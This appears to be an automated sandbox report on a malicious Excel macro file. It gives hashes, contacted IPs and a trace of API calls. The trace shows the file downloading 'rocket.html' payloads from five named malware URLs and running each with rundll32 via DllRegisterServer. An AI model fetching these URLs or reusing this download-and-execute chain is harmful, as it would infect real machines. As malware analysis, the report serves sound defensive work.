Summary | ZeroBOX

catalog-350434392.xlsm

Category Machine Started Completed
FILE s1_win7_x6402 April 17, 2021, 10:15 a.m. April 17, 2021, 10:22 a.m.
Size 82.4KB
Type Microsoft Excel 2007+
MD5 94e7b5a0f5cecb24336de03de0771631
SHA256 6e40acfc199f10bc4254013287e96fcdb750287ede1707e5661aab84107c17e6
CRC32 74BC2F09
ssdeep 1536:j7MQ0CmrClu286aYbgBF+iy+fCn/dDuL7QQ64eyZJViW++poHn2:j4PF286aYbgE+qwXQQteyZJAW++42
Yara None matched

IP Address Status Action
116.0.21.14 Active Moloch
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
192.185.214.152 Active Moloch
34.95.253.189 Active Moloch
50.87.146.86 Active Moloch

request GET http://jerry-dibbert16ih.ru.com/rocket.html
request GET http://alexandrea-friesen16ka.ru.com/rocket.html
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70af1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74f41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75241000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73321000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e5e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70731000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70731000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 5776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726d1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 5776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 5776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 5776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05b10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 5776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05b20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$catalog-350434392.xlsm
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000338
filepath: C:\Users\test22\AppData\Local\Temp\~$catalog-350434392.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$catalog-350434392.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
host 172.217.25.14
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: http://jerry-dibbert16ih.ru.com/rocket.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue1
filepath: C:\Users\test22\ghnrope.rue1
1 0 0

URLDownloadToFileW

url: http://alexandrea-friesen16ka.ru.com/rocket.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue2
filepath: C:\Users\test22\ghnrope.rue2
1 0 0

URLDownloadToFileW

url: https://casadopai.net.br/drms/rocket.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue3
filepath: C:\Users\test22\ghnrope.rue3
2148270085 0

URLDownloadToFileW

url: https://ri.posgradocolumbia.edu.py/drms/rocket.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue4
filepath: C:\Users\test22\ghnrope.rue4
2148270085 0

URLDownloadToFileW

url: https://useragent20.barloggio.net/drms/rocket.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue5
filepath: C:\Users\test22\ghnrope.rue5
2148270085 0
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue3,DllRegisterServer
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue2,DllRegisterServer
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue5,DllRegisterServer
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue4,DllRegisterServer
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue1,DllRegisterServer